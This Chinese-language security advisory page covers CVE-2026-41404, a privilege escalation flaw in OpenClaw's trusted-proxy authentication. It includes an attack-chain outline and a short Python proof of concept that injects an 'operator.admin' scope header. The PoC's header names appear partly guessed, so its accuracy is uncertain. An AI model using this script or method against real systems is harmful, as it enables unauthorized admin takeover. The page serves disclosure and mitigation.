CVE-2026-41404 CVSS 8.8 高危

OpenClaw权限提升漏洞 (CVE-2026-41404)

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41404

漏洞类型

权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.31 之前的版本在受信任代理认证模式中存在范围清除不完整的漏洞。攻击者可以在非 Control-UI 客户端上声明 operator 范围，导致这些自声明的范围在身份认证路径上持续存在。这使得低权限用户能够非法获取 operator.admin 权限，从而绕过安全检查并执行管理员操作。

技术细节

该漏洞源于 OpenClaw 在处理受信任代理认证时的逻辑缺陷。在受信任代理模式下，系统应当严格限制客户端声明的身份范围，防止未授权的权限断言。然而，受影响版本未能完全清除非 Control-UI 客户端请求中的特定范围。攻击者可以通过向 API 请求注入 operator 级别的范围声明（例如通过特定的 HTTP 头），利用系统未能剥离这些元数据的缺陷。由于后端服务错误地信任了这些持久化存在的自声明范围，攻击者得以提升至 operator.admin 权限，完全控制受影响系统。

攻击链分析

STEP 1

步骤1：侦察与准备

攻击者识别出目标 OpenClaw 实例启用了受信任代理认证模式，并获取了一个有效的低权限用户令牌。

STEP 2

步骤2：构造恶意请求

攻击者使用非 Control-UI 客户端向服务器发送请求，并在请求头或参数中恶意注入 'operator.admin' 范围声明。

STEP 3

步骤3：权限提升

由于系统未清除非 Control-UI 客户端注入的范围，后端错误地接受了该权限声明，赋予攻击者管理员权限，从而执行敏感操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target endpoint that requires admin privileges
target_url = "https://<openclaw-instance>/api/admin/config"

# Attacker's low-privilege token
auth_token = "<low_priv_token>"

headers = {
    "Authorization": f"Bearer {auth_token}",
    # Simulate a non-Control-UI client injecting scopes
    "X-Original-Uri": "/api/admin/config", # May be required by proxy logic
    "X-Scope": "operator.admin" # Injecting the privileged scope
}

response = requests.get(target_url, headers=headers)

if response.status_code == 200:
    print("[+] Exploit successful! Admin access granted.")
    print(response.json())
else:
    print("[-] Exploit failed.")

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

建议立即升级到修复版本。若无法立即升级，应暂时禁用受信任代理认证模式，或在反向代理层配置严格的规则，剥离所有传入请求中非预期的 Scope 头部，防止客户端自行声明权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表